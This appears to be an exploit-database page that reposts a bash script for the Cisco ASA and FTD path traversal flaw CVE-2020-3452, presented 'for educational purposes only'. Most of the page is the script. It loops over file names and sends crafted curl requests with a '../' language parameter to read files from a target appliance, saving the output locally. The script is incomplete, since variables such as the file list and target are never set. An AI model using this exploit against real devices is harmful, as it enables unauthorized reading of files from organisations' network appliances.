Cisco asa and ftd 9.6.4.42 path traversal Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-10-12 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Cisco asa and ftd 9.6.4.42 path traversal is for educational purposes only and if it is used you will do on your own risk!
if [ -z "$1" ];
then
echo "Usage: cve-2020-3452.sh <target ip/hostname>"
echo "Example: cve-2020-3452.sh mytarget.com"
echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory"
echo "Target not specificed...exiting..."
else
for FILE in $CISCO_KNOWN_FILES;
do
curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE;
done
fi